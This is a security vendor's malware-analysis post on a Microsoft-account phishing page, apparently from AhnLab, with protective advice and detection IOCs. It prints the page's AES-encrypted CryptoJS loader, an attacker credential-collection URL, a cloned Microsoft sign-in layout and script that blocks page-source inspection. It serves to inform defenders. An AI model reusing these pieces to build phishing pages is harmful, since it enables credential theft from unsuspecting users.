How Similar Is the Microsoft Account-stealing Phishing Page to the Actual Page?

Many corporations and users both in and outside Korea use Microsoft accounts to use major services offered by Microsoft, including Outlook, Office, OneDrive, and Windows. Users use integrated login to easily access all Microsoft services linked to their account. What does this mean for the threat actor? There is no better target for attacks because there is a large volume of information that can be gained using just one account. Particularly in the case of users that handle sensitive information in corporations, the information that can be gained through their Microsoft accounts would be ‘fruitful’ for the threat actors.

For these reasons, a large portion of phishing emails with the purpose of stealing login credentials target Microsoft accounts. These cases are also covered in the ‘ASEC Weekly Phishing Email Threat Trend.’ Threat actors create phishing pages to lead users to log in to their Microsoft account, and these pages are made into HTML or HTM script files which are then attached to emails or embedded as a link in the body of the email. Would users be able to distinguish such phishing pages? The screen that we are about to explain is a fake login phishing page made for stealing Microsoft accounts, distributed during the last 1-2 weeks.

Below is the real Microsoft account login page. The layout of the screen such as the background color, font, size and color of the button is very similar to the actual page, making it difficult for users to distinguish the two. Past phishing pages had somewhat awkward page layouts with low-resolution logos or the logos placed in slightly wrong positions, so they could be easily identified from the pages only. In comparison to these, the recently detected type was made elaborately and had a higher rate of attack success.

In addition to the identical screen layout, some fake Microsoft login pages also had reCAPTCHA. The threat actors had added a verification step to make the users trust these pages even more. The following is a phishing page targeting domain users in a certain county in the US. It is not easy for an ordinary user to determine whether or not the page is a phishing page only from the layout.

Scripts of such carefully made phishing pages seem to have been created with as much effort as the layout of the screen. CryptoJS was used to decrypt the AES-encoded strings, and at the document.write(decrypted.toString(CryptoJS.enc.Utf8)); stage, the phishing page script code was loaded. Many phishing page scripts use methods such as atob, Base64, or Percent-encoding and are more complex than encoding strings. It seems that the encryption process was used to bypass automated script decoding methods and detection algorithms.

<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>
<script>
var url_string = "...."; // comment: concealed
var o365File = "https://toolzcontructed.com/o3651.php";
let ciphertextWA = CryptoJS.enc.Hex.parse("e4ad44edb819990ffdbcb8beaa56db2bc476d724f10....."); // comment: concealed
let keyWA = CryptoJS.enc.Utf8.parse("32045938420609488026218382801049");
let ivWA = CryptoJS.enc.Utf8.parse("3105230020482131");
let ciphertextCP = { ciphertext: ciphertextWA };
let decrypted = CryptoJS.AES.decrypt(ciphertextCP, keyWA, { iv: ivWA });
document.write(decrypted.toString(CryptoJS.enc.Utf8));
</script>

The script code of the loaded phishing page replicated the Microsoft account login page almost identically. The following is a part of the code that expresses the layout in reference to the background screen and the vector logo image. However, the real Microsoft account login page does not form its layout like this. This code is essential for replication but most users who do not examine the script code are not aware of this.

<div id="lightboxBackgroundContainer">
<div class="background-image-holder" role="presentation">
<div class="background-image ext-background-image"
style="background-image: url(&quot;https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);">
</div>
</div>
</div>
<div class="outer" id="bgImgCenter">
<div class="template-section main-section">
<div class="middle ext-middle">
<div class="full-height">
<div class="flex-column">
<div class="win-scroll">
<div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
<div><img class="logo" role="img"
pngsrc="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png"
svgsrc=""
src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
alt="Microsoft"></div>

There is a code that deactivates all events such as the right-click event and the keyboard Ctrl+S input event. Due to this, all methods that allow users to view the script code, such as clicking ‘View Page Source’ on web screens or the ‘developer tools’ of web browsers, all become unavailable. The only open field of entry is the password field for the Microsoft account. The password passes through a length check, so only the valid password values were taken. After the password is entered and sent to the threat actor’s server, the page is redirected to the real Microsoft Office365 page. The threat actor seems to have put in much effort to not expose the script of the phishing page, adequately filter values, and make sure the user does not become aware of the theft after the act is successful.

<script>// prevent ctrl + swindow.addEventListener('keydown', async (e) => {if (e.ctrlKey && (e.which == 83)) {e.preventDefault();return false;}});window.addEventListener('contextmenu', event => event.preventDefault());document.onkeydown = function (e) {if (event.keyCode == 123) {return false;}

Fake Microsoft login pages like the one above were distributed via attachments in emails. These emails were sent globally, not specific to particular countries or corporations. The following are the emails and their bodies. They were sent in English, and no Korean versions have been identified as of yet. There was almost no text in the bodies, and they only had an attachment. This is something that users can take notice of and suspect that they may be phishing emails.

By following the security protocols below, users can prevent attacks and minimize damage from phishing pages that steal Microsoft accounts.

  • Do not click or execute emails with suspicious senders, content, or attachments as they are likely to be phishing emails.
  • When logging into a Microsoft account, make sure that the currently accessed domain address is the real Microsoft service address and that the connection type is HTTPS.
  • Use a two-step verification method with the Microsoft account. The threat actor may have to go through a personal identification process even if they succeed in leaking your account credentials.

AhnLab V3 detects and blocks the malware using the aliases below.

[File Detection]

  • Phishing/HTML.FakeMS.SC184878 (2022.11.30.00)
  • Phishing/HTML.FakeMS.SC184966 (2022.12.06.00)
  • Phishing/HTML.FakeMS.SC184967 (2022.12.06.00)

[IOC Info]

  • 4ba7fe8ad00623bf28b943272aa07de9
  • fbe4c854b285693895d30afa72a9c004

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

3 2 votes
Article Rating
guest

0 Comments
Inline Feedbacks
View all comments